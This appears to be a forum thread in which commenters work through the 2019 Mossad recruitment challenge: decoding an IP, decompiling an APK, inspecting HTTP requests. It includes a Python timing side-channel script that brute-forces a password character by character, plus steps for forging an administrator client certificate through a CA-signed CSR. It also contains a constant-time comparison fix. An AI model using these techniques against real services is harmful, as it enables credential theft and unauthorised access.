You're close, but that first endpoint is just to retrieve the auth URL, no need to post anything to it. It then passes the seed and password to the returned URL, so:
"http://35.246.158.51:8070/auth/v2" gets '{"Seed": "xxx", "Password": "xxx"}' of some kind
I haven't yet figured out what those are though...
See:
  Future<Token> login(String seed, String password) {
    var headers = new Map<String,String>();
    return _netUtil.get(LOGIN_URL, headers:headers).then((dynamic authUrl) {
      try {
        if (authUrl == null) {
          return Future<Token>.sync(() => new Token("", false, 0));
        }
        var loginUrl = BASE_URL + AuthURL.map(json.decode(authUrl.body)).url;
So reading about flutter, there's quick reload information in debug mode[0]
This leads me to believe that the seed and password entered in development / in the cookie jar from a previous attempt are somewhere in the `isolate_snapshot_data` file
Replacing the original URL with http://35.246.158.51:8070/auth/v2 and then sending a JSON body like '{"Seed": "3d375032374147a7865753e4bbc92682", "Password": "d7c6bdcfcb184bf587ceee7c7c28e72e"}' with "Content-Type: application/json" returns {"IsValid":false,"LockURL":"","Time":136764}
The Time here (as per my understanding of the code) is the request duration, which somehow contradicts Postman's request duration field.
Now, one weird thing I've noticed about this app: if I install it on a regular device, connect that to a proxy, type gibberish into the fields and click Login, the following code gets invoked:
  void _submit() async {
    final form = formKey.currentState;
    if (form.validate()) {
      setState(() => _isLoading = true);
      form.save();
      _networkActions.login(_seed, _password)
          .then((result) => _loginCompleted(result))
          .catchError((e) {
        _loginCompleted(new Token("", false, 0));
      });
    }
  }
If a loading icon appears, then I assume the code passed the condition and reached this line: "setState(() => _isLoading = true);". Now the weird part is that I don't see any outgoing connections from the app... (I use Charles to capture requests.)
It's normal that you don't see any traffic using Charles, since Charles can only intercept traffic made by HttpUrlConnection or OkHttp. Since Flutter doesn't use either of those, you can't see anything in Charles.
What do you do if they have sandbox escapes you don't know about? The kind of person that runs it in a VM is someone they'd probably want to be looking at.
THIS IS LEGITIMATE.
The Israeli Mossad had an ad today, https://www.algemeiner.com/2019/05/09/mossad-marks-israeli-i...
with a picture.
The picture has 4 rows of trophies, which should be converted to 4 numbers using binary --> decimal.
Those four numbers are 35, 246, 158, 51.
As an ip address, 35.246.158.51 leads to the site OP posted.
The challenges usually involve static analysis / disassembly, breaking improperly configured crypto, etc. The best part (for me at least) is that competitors must submit a write-up of how they cracked the challenge, and the best write-ups are published. It makes for fascinating reading even if you’re not really into that scene.
On page 397 there is an entry in the index:
iWalk, v2 71
On the same page there are interesting terms like
Islamic terrorism, jihad via internet, Judaism...
Also, the page number 71 that stands next to the iWalk term is an interesting coincidence, since this riddle is celebrating 71 years of Israeli independence...
jQuery is still a valid way to manipulate the DOM. There’s nothing wrong with doing that, especially if you already need to load jQuery for something else. I don’t think this is what the comment was referring to.
If I need to read the source code of a fucking website for it to be useful, then it's either a really special edge-case or the designer is a moron. Guess which case this is.
Why not upload a plain text file in the first place?
Oh, come on. You have to have an old phone lying around to factory reset for shits and giggles. Not like they'd burn good zero days on a publicity stunt.
Remember, this thing'll be getting picked apart by everybody considering the source.
Unless you're afraid of getting black bagged that i...<SIGNAL LOST>
Yes, and those people might visit a website, which asks for...shudder...cookies. If you can show that the cookies do something nefarious, I'd be interested. Do you think the general population would even get to the point of installing an APK?
"Consider what that means for Mossad"
At this point, you can't even prove that the APK does anything nefarious - and it would be dangerous for the Mossad if it did, because the challenge is literally to decompile the APK.
Level 5: You've downloaded Droid4X extra because of it, installed Java and everything and then you come back on HN to look if somebody is already on the next challenge (in order to save time) and then you start again, but with the new challenge :)
First Challenge Solution:
Mossad 2019 Challenge Start: https://r-u-ready-4.it/ Every line in the image is binary 8-bit number that will give you an ip address : 35.246.158.51
Download app.apk from http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk
Remember your Client ID - mine is 854279b4c89e4b5c9722352c3f9f1d6c. You will use it as the "Seeder" property in the app.
Using Wireshark (or any other packet sniffer) we can see that the login button does this:
  POST /auth/v2 HTTP/1.1
  user-agent: iWalk-v2
  content-type: application/json; charset=utf-8
  accept-encoding: gzip
  content-length: 29
  host: 35.246.158.51:8070

  {"Seed":"admin","Password":"admin "}

  HTTP/1.1 200 OK
  Content-Type: application/json
  Date: Wed, 08 May 2019 21:49:05 GMT
  Content-Length: 47
Using http://www.javadecompilers.com/, I decompiled the apk and got a look at the Manifest:
  <?xml version="1.0" encoding="utf-8" .......
  <activity android:configChanges="density|fontScale|keyboard|keyboardHidden|layoutDirection|locale|orientation|screenLayout|screenSize" android:hardwareAccelerated="true" android:launchMode="singleTop" android:name="com.iwalk.locksmither.MainActivity" .... .....
The line "look for us on github.com" got my attention, so I looked for iwalk.locksmither on GitHub and found "iwalk-locksmithers", link: https://github.com/iwalk-locksmithers-app. The server source code was there. In the code, there are a few comments that can help, in particular this part:
  for currentIndex < len(lock.Password) && currentIndex < len(loginData.Password) {
      if lock.Password[currentIndex] != loginData.Password[currentIndex] {
          break
      }
      //OG: securing against bruteforce attempts... ;-)
      time.Sleep(30 * time.Millisecond)
      currentIndex++
  }
The "securing against bruteforce" (trying all combinations) is the weakness. The idea behind recovering the password is to try only one char at first. If we get a 30ms delay, it means we got the 1st char right, so then we can check the next one: we try 2 chars (the 1st we know, the second we guess). If we get a 60ms (+-) delay then we got the 2nd char, and we try the third one, and so on, again and again, until we get the password.
To solve it, I wrote a simple C# program that does an HTTP POST to the server in a loop, every time trying to add a new char to the password, and if we get a delay that is +-30ms more than the last try, we add that char to our final password. The URI is http://35.246.158.51:8070/auth/v1_1 and the user agent is ed9ae2c0-9b15-4556-a393-23d500675d4b (as written in the server code). I did some averaging of the delays. The password length is 32 hex chars (I didn't know that until I guessed the password). We know the password is correct when we get back "IsValid":true. *The Time we get back is in nanoseconds, not ms.
After I entered the password and client id, I got a link for a token and a link for challenge 2.
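The comparison loop quoted above, as an added illustration that is not from the challenge's server repository or from any commenter's code: the early-exit loop with its per-character sleep next to the same check done with hmac.compare_digest, driven by a simulated clock (counting sleeps instead of sleeping) so it shows deterministically that the first version leaks how many leading characters matched and the second does not. The page only shows the loop itself, so the final full-length equality check after it is an assumption, and the secret used is a constructed sample, not the challenge value.

```python
import hmac
from typing import Callable, Tuple

DELAY_NS = 30_000_000   # the server's 30 ms sleep per matched character, in ns


def leaky_compare(stored: str, supplied: str) -> Tuple[bool, int]:
    """Early-exit comparison shaped like the quoted Go loop. The sleep is
    replaced by a counter so the leak is measurable without real waiting.
    Returns (matched, simulated_elapsed_ns). The equality check after the
    loop is an assumption; the page only shows the loop."""
    elapsed = 0
    i = 0
    while i < len(stored) and i < len(supplied):
        if stored[i] != supplied[i]:
            break            # leaves the loop as soon as a character differs
        elapsed += DELAY_NS  # stands in for time.Sleep(30 * time.Millisecond)
        i += 1
    return (i == len(stored) == len(supplied)), elapsed


def constant_time_compare(stored: str, supplied: str) -> Tuple[bool, int]:
    """Hardened form: hmac.compare_digest does not stop at the first mismatch,
    and any throttling delay must not depend on how much of the guess was
    right, so the simulated cost here is the same for every guess."""
    ok = hmac.compare_digest(stored.encode(), supplied.encode())
    return ok, DELAY_NS * len(stored)


def inferred_prefix(compare: Callable[[str, str], Tuple[bool, int]],
                    stored: str, guess: str) -> int:
    """What a timing observer learns from one request: elapsed / per-char delay.
    Real measurements also carry network jitter, which is why the write-up
    above averaged several tries per character."""
    _, elapsed = compare(stored, guess)
    return elapsed // DELAY_NS


if __name__ == "__main__":
    secret = "3d375032"   # constructed sample secret, not the challenge value
    for guess in ["a", "3", "3d", "3dX", "3d3750"]:
        print(guess,
              "leaky:", inferred_prefix(leaky_compare, secret, guess),
              "constant-time:", inferred_prefix(constant_time_compare, secret, guess))
```

With the leaky version the inferred prefix grows by one each time a guess gets another leading character right; with the constant-time version it is the same number for every guess, so the response time tells the observer nothing about the secret.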
Not sure I understand the brute-force code.
I'm trying to get the first char.
I've written something along
  import string
  import requests

  URL = 'http://35.246.158.51:8070/auth/v1_1'
  SEED = 'd14236b60e0f4aef94499cb648a5f522'
  AGENT = 'ed9ae2c0-9b15-4556-a393-23d500675d4b'
  HEADERS = {'User-Agent': AGENT}
  CHARACTERS = string.printable   # a-zA-Z!@#$%^&*()_-= and the rest
  DELAY_NS = 30000000             # Time comes back in nanoseconds; 30 ms per matched char
  DISCOVERED_PASSWORD = ''

  def attempt(password):
      # the server expects a JSON body and the user agent from the server code
      result = requests.post(URL, json={"Seed": SEED, "Password": password},
                             headers=HEADERS)
      return result.json()['Time']

  def check(candidates):
      # expect one more 30 ms delay than the chars already found
      threshold = (len(DISCOVERED_PASSWORD) + 1) * DELAY_NS - DELAY_NS // 2
      slow = []
      for i, char in enumerate(candidates):
          print('run {}. char {}'.format(i, char))
          elapsed = attempt(DISCOVERED_PASSWORD + char)
          if elapsed > threshold:
              # noisy: a char can pass on one run and fail on the next
              print(elapsed)
              slow.append(char)
      return slow or candidates

  res = check(CHARACTERS)
  for i in range(10):   # re-check the survivors to filter out timing noise
      res = check(res)
  print(res)
  DISCOVERED_PASSWORD += res[0]
  print("FOUND ONE MORE! {}".format(DISCOVERED_PASSWORD))
But I got some progress:
1. Image leads to subdomain: http://dev.missilesys.com/
2. It generates a p12 certificate for login to the admin panel. You should enter username/password, submit the form and click download. (If there is no download button, just try something like this: refresh the page, change the method from POST to GET, enter credentials and press Submit; after that press Submit again and it'll appear.)
3. Add the certificate to Keychain (on macOS) and go to missilesys.com.
4. You've got into the admin panel, but you have no permissions to shut it down. You need to be an administrator.
5. You should get a .p12 certificate for administrator, but you can't because "User already exists!". This is the place where I'm stuck.
It would be great if you have an idea how to handle with it :)
As I checked: you need to input administrator in the login field without a password in the browser, with Preserve log mode on, and jAvAsCrIpT generates it by login name; check Headers > Form Data > private key. I think I am on the way, but now I need the password from the Admin cert :))
I have an idea, but don't have the time to check :-/
Using online CSR generator I succeeded to sign a CA certificate.. So maybe we can use the signed certificate to sign another certificate for admin user on behalf of the root certificate?
1. I created CSR with CA:TRUE and send it to the server.
2. The server signed it and returned me a certificate.
3. I use the given certificated with CA:TRUE from the server and sign a new certificate with the username administrator.
4. I install the certificate on my browser and should get in.
All of the above sounds great. However, it is still(!!!) not working for me.
Where am I going wrong
Can you explain step by step how you have done it? :)
If you change to CSR and key in the request to self-generated, it still says username already exists.
on the other side, if I create my own certificate using custom CSR and key, I still cannot sign it with website CA (taken from original p12 file) since I do not have the private key.
Poke around and you'll find code for POSTing JSON-encoded credentials to http://35.246.158.51:8070/auth/getUrl. (Grep for the IP to find it.)
So, using the web site name as the seed and the 'client id' as the password, we get:
$ curl -X POST -H "Content-Type: application/json" -d '{"Seed": "3d375032374147a7865753e4bbc92682", "Password": "d7c6bdcfcb184bf587ceee7c7c28e72e"}' http://35.246.158.51:8070/auth/getUrl
The response is an HTTP 200 and: {"AuthURL":"/auth/v2"}
http://35.246.158.51:8070/auth/v2 is I guess the next step.
edit: The /auth/getUrl endpoint responds to any request with the same response, so that may not be the right Seed/Password combination.